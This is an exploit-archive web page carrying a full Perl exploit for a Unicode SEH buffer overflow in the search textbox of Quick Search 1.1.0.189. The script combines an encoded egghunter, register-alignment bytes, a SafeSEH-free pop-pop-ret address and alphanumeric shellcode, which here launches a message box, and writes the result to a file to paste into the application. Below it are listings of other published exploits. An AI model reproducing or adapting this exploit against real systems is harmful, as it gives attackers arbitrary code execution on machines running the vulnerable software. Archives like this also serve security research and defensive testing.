Menu

Search for hundreds of thousands of exploits

"Quick Search 1.1.0.189 - search textbox Buffer Overflow (SEH Unicode) (Egghunter)"

Author

Exploit author

"Tomislav Paskalev"

Platform

Exploit platform

windows

Release date

Exploit published date

2015-04-23

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
#!/usr/bin/perl

###########################################################################=
#######################
# Exploit Title: Quick Search 1.1.0.189 'search textbox' Unicode SEH egghunter Buffer Overflow
# Date: 2015-04-23
# Exploit Author: Tomislav Paskalev
# Vulnerable Software: Quick Search v1.1.0.189
# Vendor Homepage: http://www.glarysoft.com/
# Software Link: https://www.exploit-db.com/apps/93feb6805c08d3ca84b0636a3a986a56-qsearchsetup.exe
# Version: 1.1.0.189
# Tested on: Windows XP SP2 EN
# OSVDB-ID: 93445
###########################################################################=
#######################
# Credits:
# - Vulnerability identified by ariarat
#   http://www.exploit-db.com/exploits/25443/
###########################################################################=
#######################
# Exploit development notes:
# - instead of attaching the process, start the executable within the debugger
#   - the application's module gtms_D7.bpl was not compiled with SafeSEH
#     - since this is a unicode buffer overflow \x00 will not terminate the string
#       - 6 available unicode friendly P/P/R pointers within the module
#         - this exploit should work across different OS versions
#           (tested only on Win XP SP2 EN)
#   - several other unicode friendly aplication modules are available, but have not been checked
###########################################################################=
#######################
# How to exploit:
# - Quick Search -> (click arrow for menu) Match Path -> (click arrow for menu) Full Mode ->=20
#   (paste created exploit string into the search textbox)
#   - once the exploit string is pasted, the egghunter starts to search the memory for the marker
#     - on my test machine the search takes around 30 seconds (until the shellcode gets executed)
#       - during the search the mouse cursor will NOT have a hourglass displayed beside it
#       - during the search the application will NOT become unresponsive (i.e. it will be usable)
###########################################################################=
#######################
# Thanks to:
# - ariarat (PoC)
# - Peter Van Eeckhoutte (exploit development tutorials)
# - Offensive Security (IT security courses, admin support)
###########################################################################=
#######################

my $junk = "A" x 21;

# Egghunter code; NtAccessCheckAndAuditAlarm method; searches for "0t0t"
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $egghunter =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
"B9KHHHYCDO4KD1KB3QIQ9OY190IQ9PIQ9PI0IOS13PCPC1313PCOGB11J2J11R8R" .
"0P01100OQRK11OQB102Q1OR02PB0BNP0BORQ11228PPP8Q1PBT50JQ9RUOF0M212" .
"J1Z3IRO3F2O41QB1VP2S20J26RBP3BHRZ2MBVPNRGPLCCOESBCJ2C14482O2O18B" .
"52000P02EB032PTBNBKR92J0L2OBR1E3ICJPLRO0B0URZ0G2KPO1I2W11Q1AA";

my $fill = "C" x (1045 - length($junk.$egghunter));
my $nextSEH = "\x41\x6d";                       # INC ECX; INSW Yz DX
my $SEH = "\x70\x34";                           # POP POP RET from gtms_D7.bpl

# jump to egghunter code
my $allign = "\x58";                            # POP EAX
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x58";                       # POP EAX
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x58";                       # POP EAX
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x05\x01\x11";               # ADD EAX, 0x11000100
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
$allign = $allign."\x2d\x09\x11";               # SUB EAX, 0x11000900
$allign = $allign."\x6d";                       # NOP/remove NULL bytes
my $jumptoegghunter = "\x50";                   # PUSH EAX
$jumptoegghunter = $jumptoegghunter."\x6d";     # NOP/remove NULL bytes
$jumptoegghunter = $jumptoegghunter."\xc3";     # RETN

# fill the rest of the stack frame + padding (to avoid a memory area which coverts to upper alpha)
my $fill2 = "D" x 500;

# allign EAX and jump to shellcode
# (this gets executed after the marker is found)
my $allign2 = "\x6d";                           # NOP/remove NULL bytes
$allign2 = $allign2."\x57";                     # PUSH EDI
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
$allign2 = $allign2."\x58";                     # POP EAX
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
$allign2 = $allign2."\xb9\x1b\xaa";             # MOV ECX, 0xaa001b00
$allign2 = $allign2."\xe8";                     # ADD AL,CH (equivalent to adding "1b" (from the previous command)
                                                # to the last two bytes of EAX; i.e. increase EAX with "1b")
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
$allign2 = $allign2."\x50";                     # PUSH EAX
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
$allign2 = $allign2."\xc3";                     # RETN

# msfpayload windows/messagebox
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $shellcode =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
"BYKWTHY44MTZTQNPV29190IQ919PI19PIOY19Q3Q3PC13Q3PC13070QPZ2JQ1B8R" .
"000Q10011RKOQQ10QOBOQ0BOBORQ200Q2Q2Q1Q2QHB0OHQ1Q2CEPJQ91JRY2XBKB" .
"MPKPI19S3Q4NVQ40J0TBT2QOZRR0N0RPPD70TT1RJC9OEP4PN2KNQQQPD400N2KN" .
"PSFQ4PLPNBKNT0615PL2NRKRPOV0418PNRKBSPNOW20PL0KBGQ6B51XPRRO2D0X0" .
"Q35PLP3NS1YB3P11H0Q49BOR92QRQ40RL0KBPRLBD340UD4RNBK010UQW0L2N2KN" .
"S343F18QBQHBFS1492Z0LPK0PPJB7QXBL0KBR3J2QNP33P1T8RKCJQ3OGPDQ3D9R" .
"NBKPTSDBL0KBFQQOX2N4621PK0OR0NQD9R02KPL0N0LRKNTPKRP0RB4162G2I21N" .
"XPO162M03NQ38OWNX2KQ9QTB7PKRSPL1QOD1F0HBQ2E2M01PNRK02CJ0UCDPF1QP" .
"JPKP5OFBLPK16RLR0PK0N2KQCQZC50L1EPQCHBK0NRK45PTBN2K1CP1QX1XPOD9Q" .
"ST4PE3DCE0LD3R1NX13NXP2C3NX1G1IBNODRK0948C5POSI2JQRQ5NX0L0NNR2N3" .
"F2NBJ0LR3BBPK0XBMPO492OCIBO29RO0OSIT7P52D0D0MRKC1RNPJD8PY422C0CB" .
"OBWSEPLP4341C2BB8QX0N2N0IBOQ92OD9BO2N1YPC45Q7RXNR0HB02L2PBLB1003" .
"7NQ0148RVPS2F1B342NOC0TPUNXODOE221CNRQ51312PKNXP10LQFOTQ62J0MB92" .
"MP61606NYBOBSBEBCODPLOYBO02CFNPPMBKPNOX2OQBC2BMPOPL2M0W1W2LNW24S" .
"112BK1H41T11YBO29BO2KPO130X2PQHNQ00P1P0QGB0NS0XNRCDQEP531BC43OTR" .
"0P12KRK0NRH410LD4BD45PT0LOY0JPCBBOXC2PNOF0N03BHPW0PR1D82PC1BDP43" .
"5P9OB0OB508ODP00B0LS2PI030SD508NQSD370PC3PQP040D5P8020OOEOI0B1DN" .
"PS5NUOHP31ER4OHPB0PT20L031HNS0D13B8BSB5NQ00P1BXQ70P3B0OPPQVBUT0S" .
"B18OBB4320E012HT4ODPCR8QU40R30SRBPO32PNORQ8P5D0QQQTOENXR2PEPP38B" .
"R0NPG20D0BIT0BNB5P80B251QS4T02IR0ROP038T30UP2B83CR5R3232B0HP20OR" .
"3B4P0C5R1NPB1SH0EP5T5P41WR0Q5P3BBQ8P3BW03B1OCQINPRNP4T1SJ2IPO3HT" .
"22LC724B3CBBN390MNQQ60QT912120J01R013C32CS1QS2B0KPOB8R03DBQ2K2PR" .
"PPP0KPOBB3E0FQXOQOQAA";

my $payload = $junk.$egghunter.$fill.$nextSEH.$SEH.$allign.$jumptoegghunter.$fill2."0t0t".$allign2.$shellcode;

open(myfile,'>QuickSearch_egghunter_messagebox.txt');
print myfile $payload;
close(myfile);
print "Wrote ".length($payload)." bytes\n";
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2018-05-06 "WordPress Plugin User Role Editor < 4.25 - Privilege Escalation" webapps php "Tomislav Paskalev"
2016-10-24 "Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)" local windows_x86 "Tomislav Paskalev"
2016-10-18 "Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)" local windows_x86 "Tomislav Paskalev"
2015-11-02 "Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution" remote windows_x86 "Tomislav Paskalev"
2015-08-12 "Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)" local windows "Tomislav Paskalev"
2015-08-07 "Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)" local windows_x86 "Tomislav Paskalev"
2015-04-23 "Quick Search 1.1.0.189 - search textbox Buffer Overflow (SEH Unicode) (Egghunter)" local windows "Tomislav Paskalev"
2015-04-22 "MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (2)" local windows "Tomislav Paskalev" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected